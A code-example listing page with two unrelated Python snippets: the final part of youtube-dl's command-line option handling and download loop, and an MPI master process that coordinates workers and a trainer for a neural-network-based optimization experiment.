        postprocessors.append({
            'key': 'FFmpegSubtitlesConvertor',
            'format': opts.convertsubtitles,
        })
    if opts.embedsubtitles:
        postprocessors.append({
            'key': 'FFmpegEmbedSubtitle',
        })
    if opts.embedthumbnail:
        already_have_thumbnail = opts.writethumbnail or opts.write_all_thumbnails
        postprocessors.append({
            'key': 'EmbedThumbnail',
            'already_have_thumbnail': already_have_thumbnail
        })
        if not already_have_thumbnail:
            opts.writethumbnail = True
    # XAttrMetadataPP should be run after post-processors that may change file
    # contents
    if opts.xattrs:
        postprocessors.append({'key': 'XAttrMetadata'})
    # Please keep ExecAfterDownload towards the bottom as it allows the user to modify the final file in any way.
    # So if the user is able to remove the file before your postprocessor runs it might cause a few problems.
    if opts.exec_cmd:
        postprocessors.append({
            'key': 'ExecAfterDownload',
            'exec_cmd': opts.exec_cmd,
        })
    external_downloader_args = None
    if opts.external_downloader_args:
        external_downloader_args = compat_shlex_split(opts.external_downloader_args)
    postprocessor_args = None
    if opts.postprocessor_args:
        postprocessor_args = compat_shlex_split(opts.postprocessor_args)
    match_filter = (
        None if opts.match_filter is None
        else match_filter_func(opts.match_filter))

    ydl_opts = {
        'usenetrc': opts.usenetrc,
        'username': opts.username,
        'password': opts.password,
        'twofactor': opts.twofactor,
        'videopassword': opts.videopassword,
        'ap_mso': opts.ap_mso,
        'ap_username': opts.ap_username,
        'ap_password': opts.ap_password,
        'quiet': (opts.quiet or any_getting or any_printing),
        'no_warnings': opts.no_warnings,
        'forceurl': opts.geturl,
        'forcetitle': opts.gettitle,
        'forceid': opts.getid,
        'forcethumbnail': opts.getthumbnail,
        'forcedescription': opts.getdescription,
        'forceduration': opts.getduration,
        'forcefilename': opts.getfilename,
        'forceformat': opts.getformat,
        'forcejson': opts.dumpjson or opts.print_json,
        'dump_single_json': opts.dump_single_json,
        'simulate': opts.simulate or any_getting,
        'skip_download': opts.skip_download,
        'format': opts.format,
        'listformats': opts.listformats,
        'outtmpl': outtmpl,
        'autonumber_size': opts.autonumber_size,
        'restrictfilenames': opts.restrictfilenames,
        'ignoreerrors': opts.ignoreerrors,
        'force_generic_extractor': opts.force_generic_extractor,
        'ratelimit': opts.ratelimit,
        'nooverwrites': opts.nooverwrites,
        'retries': opts.retries,
        'fragment_retries': opts.fragment_retries,
        'skip_unavailable_fragments': opts.skip_unavailable_fragments,
        'buffersize': opts.buffersize,
        'noresizebuffer': opts.noresizebuffer,
        'continuedl': opts.continue_dl,
        'noprogress': opts.noprogress,
        'progress_with_newline': opts.progress_with_newline,
        'playliststart': opts.playliststart,
        'playlistend': opts.playlistend,
        'playlistreverse': opts.playlist_reverse,
        'noplaylist': opts.noplaylist,
        'logtostderr': opts.outtmpl == '-',
        'consoletitle': opts.consoletitle,
        'nopart': opts.nopart,
        'updatetime': opts.updatetime,
        'writedescription': opts.writedescription,
        'writeannotations': opts.writeannotations,
        'writeinfojson': opts.writeinfojson,
        'writethumbnail': opts.writethumbnail,
        'write_all_thumbnails': opts.write_all_thumbnails,
        'writesubtitles': opts.writesubtitles,
        'writeautomaticsub': opts.writeautomaticsub,
        'allsubtitles': opts.allsubtitles,
        'listsubtitles': opts.listsubtitles,
        'subtitlesformat': opts.subtitlesformat,
        'subtitleslangs': opts.subtitleslangs,
        'matchtitle': decodeOption(opts.matchtitle),
        'rejecttitle': decodeOption(opts.rejecttitle),
        'max_downloads': opts.max_downloads,
        'prefer_free_formats': opts.prefer_free_formats,
        'verbose': opts.verbose,
        'dump_intermediate_pages': opts.dump_intermediate_pages,
        'write_pages': opts.write_pages,
        'test': opts.test,
        'keepvideo': opts.keepvideo,
        'min_filesize': opts.min_filesize,
        'max_filesize': opts.max_filesize,
        'min_views': opts.min_views,
        'max_views': opts.max_views,
        'daterange': date,
        'cachedir': opts.cachedir,
        'youtube_print_sig_code': opts.youtube_print_sig_code,
        'age_limit': opts.age_limit,
        'download_archive': download_archive_fn,
        'cookiefile': opts.cookiefile,
        'nocheckcertificate': opts.no_check_certificate,
        'prefer_insecure': opts.prefer_insecure,
        'proxy': opts.proxy,
        'socket_timeout': opts.socket_timeout,
        'bidi_workaround': opts.bidi_workaround,
        'debug_printtraffic': opts.debug_printtraffic,
        'prefer_ffmpeg': opts.prefer_ffmpeg,
        'include_ads': opts.include_ads,
        'default_search': opts.default_search,
        'youtube_include_dash_manifest': opts.youtube_include_dash_manifest,
        'encoding': opts.encoding,
        'extract_flat': opts.extract_flat,
        'mark_watched': opts.mark_watched,
        'merge_output_format': opts.merge_output_format,
        'postprocessors': postprocessors,
        'fixup': opts.fixup,
        'source_address': opts.source_address,
        'call_home': opts.call_home,
        'sleep_interval': opts.sleep_interval,
        'max_sleep_interval': opts.max_sleep_interval,
        'external_downloader': opts.external_downloader,
        'list_thumbnails': opts.list_thumbnails,
        'playlist_items': opts.playlist_items,
        'xattr_set_filesize': opts.xattr_set_filesize,
        'match_filter': match_filter,
        'no_color': opts.no_color,
        'ffmpeg_location': opts.ffmpeg_location,
        'hls_prefer_native': opts.hls_prefer_native,
        'hls_use_mpegts': opts.hls_use_mpegts,
        'external_downloader_args': external_downloader_args,
        'postprocessor_args': postprocessor_args,
        'cn_verification_proxy': opts.cn_verification_proxy,
        'geo_verification_proxy': opts.geo_verification_proxy,

    }

    with YoutubeDL(ydl_opts) as ydl:
        # Update version
        if opts.update_self:
            update_self(ydl.to_screen, opts.verbose, ydl._opener)

        # Remove cache dir
        if opts.rm_cachedir:
            ydl.cache.remove()

        # Maybe do nothing
        if (len(all_urls) < 1) and (opts.load_info_filename is None):
            if opts.update_self or opts.rm_cachedir:
                sys.exit()

            ydl.warn_if_short_id(sys.argv[1:] if argv is None else argv)
            parser.error(
                'You must provide at least one URL.\n'
                'Type youtube-dl --help to see a list of all options.')

        try:
            if opts.load_info_filename is not None:
                retcode = ydl.download_with_info_file(compat_expanduser(opts.load_info_filename))
            else:
                retcode = ydl.download(all_urls)
        except MaxDownloadsReached:
            ydl.to_screen('--max-download limit reached, aborting.')
            retcode = 101

    sys.exit(retcode)

Example 50

View license
def master_process(print_statements):
    file_record = open("data/mpi_time_data.csv", "a") # record times for experiment
    from learning_objective.hidden_function import evaluate, true_evaluate, get_settings
    import random
    import utilities.optimizer as op

    print "MASTER: starting with %d workers" % (size - 1)

    # Setup
    t1 = time.time()            # Get amount of time taken
    num_workers = size - 1      # Get number of workers
    closed_workers = 0          # Get number of workers EXIT'ed

    # Get settings relevant to the hidden function being used
    lim_domain, init_size, additional_query_size, init_query, domain, selection_size = get_settings()
    
    # Acquire an initial data set
    dataset = None
    init_assigned = 0           # init query counters
    init_done = 0

    print "Randomly query a set of initial points... ",

    while init_done < init_size:
        # Get a worker (trainer does not initiate conversation with master)
        data = comm.recv(source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG, status=status)
        source = status.Get_source()
        tag = status.Get_tag()

        if tag == WORKER_READY:
            if init_assigned < init_size:
                # Send a (m,) array query to worker
                comm.send(init_query[init_assigned, :], dest=source, tag=SEND_WORKER)
                init_assigned += 1

            else:
                # No more intial work available. Give random work
                comm.send(domain[random.choice(range(domain.shape[0])), :], 
                          dest=source, tag=SEND_WORKER)

        if tag == WORKER_DONE:
            # data is a (1, m) array
            if dataset == None: 
                dataset = data

            else:
                dataset = np.concatenate((dataset, data), axis=0)

            if contains_row(data[0, :-1], init_query):
                init_done += 1

            if print_statements:
                string1 = "MASTER: Init queries done: %3d. " % init_done
                string2 = "Submission from WORKER %2d is: " % source
                print string1 + string2 + str(data)

    print "Complete initial dataset acquired"

    # NN-LR based query system
    optimizer = op.Optimizer(dataset, domain)
    optimizer.train()

    # Select a series of points to query
    selected_points = optimizer.select_multiple(selection_size) # (#points, m) array

    # Set counters
    listen_to_trainer = True
    trainer_is_ready = True     # Determines if trainer will be used
    trainer_index = 0   # Keeps track of data that trainer doesn't have
    selection_index = 0         # Keeps track of unqueried selected_points 
    queries_done = 0            # Keeps track of total queries done
    queries_total = additional_query_size

    t0 = time.time()

    print "Performing optimization..."

    while closed_workers < num_workers:
        if selection_index == selection_size:
            # Update optimizer's dataset and retrain LR
            optimizer.retrain_LR()                            
            selected_points = optimizer.select_multiple(selection_size) # Select new points
            selection_size = selected_points.shape[0]     # Get number of selected points
            selection_index = 0                           # Restart index
            
        if queries_done < queries_total and trainer_is_ready and (dataset.shape[0] - trainer_index - 1) >= 100:
            # Trainer ready and enough new data for trainer to train a new NN.
            if print_statements:
                print "MASTER: Trainer has been summoned"

            comm.send(dataset[trainer_index: -1, :], dest=TRAINER, tag=SEND_TRAINER)
            trainer_index = dataset.shape[0] - 1
            trainer_is_ready = not trainer_is_ready # Trainer is not longer available.

        if queries_done >= queries_total and trainer_is_ready:
            comm.send("MASTER has fired Trainer", dest=TRAINER, tag=EXIT_TRAINER)

        # Check for data from either worker or trainer
        data = comm.recv(source=MPI.ANY_SOURCE, tag=MPI.ANY_TAG, status=status)
        source = status.Get_source() 
        tag = status.Get_tag()         

        if tag == WORKER_READY:
            if queries_done < queries_total:
                comm.send(selected_points[selection_index, :], 
                          dest=source, tag=SEND_WORKER) 
                selection_index += 1

            else:
                comm.send(None, dest=source, tag=EXIT_WORKER)

        elif tag == WORKER_DONE:
            dataset = np.concatenate((dataset, data), axis=0) # data is (m, 1) array
            optimizer.update_data(data)                       # add data to optimizer
            queries_done += 1                                 
            
            if print_statements:
                string1 = "MASTER: Queries done: %3d. " % queries_done
                string2 = "Submission from Worker %2d: " % source
                print string1 + string2 + str(data)
            else:
                # Print some sort of progress:
                if queries_done % (queries_total/10) == 0:
                    print "%.3f completion..." % ((1.*queries_done)/queries_total)

            if queries_done <= queries_total:
                info = "%.3f," % (time.time()-t0)
                file_record.write(info)

        elif tag == TRAINER_DONE:
            if listen_to_trainer:
                if print_statements:
                    print "MASTER: Updating neural network"

                W, B, architecture = data
                optimizer.update_params(W, B, architecture)

            trainer_is_ready = not trainer_is_ready 

        elif tag == EXIT_WORKER or tag == EXIT_TRAINER:
            closed_workers += 1 

    file_record.write("NA\n")
    file_record.close()
    t2 = time.time()
    print "MASTER: Total update time is: %3.3f" % (t2-t1)
    print "Best evaluated point is:"
    print dataset[np.argmax(dataset[:, -1]), :]
    print "MASTER: Predicted best point is:"
    optimizer.retrain_LR()
    domain, pred, hi_ci, lo_ci, nn_pred, ei, gamma = optimizer.get_prediction()
    index = np.argmax(pred[:, 0])
    print np.concatenate((np.atleast_2d(domain[index, :]), np.atleast_2d(pred[index, 0])), axis=1)[0, :]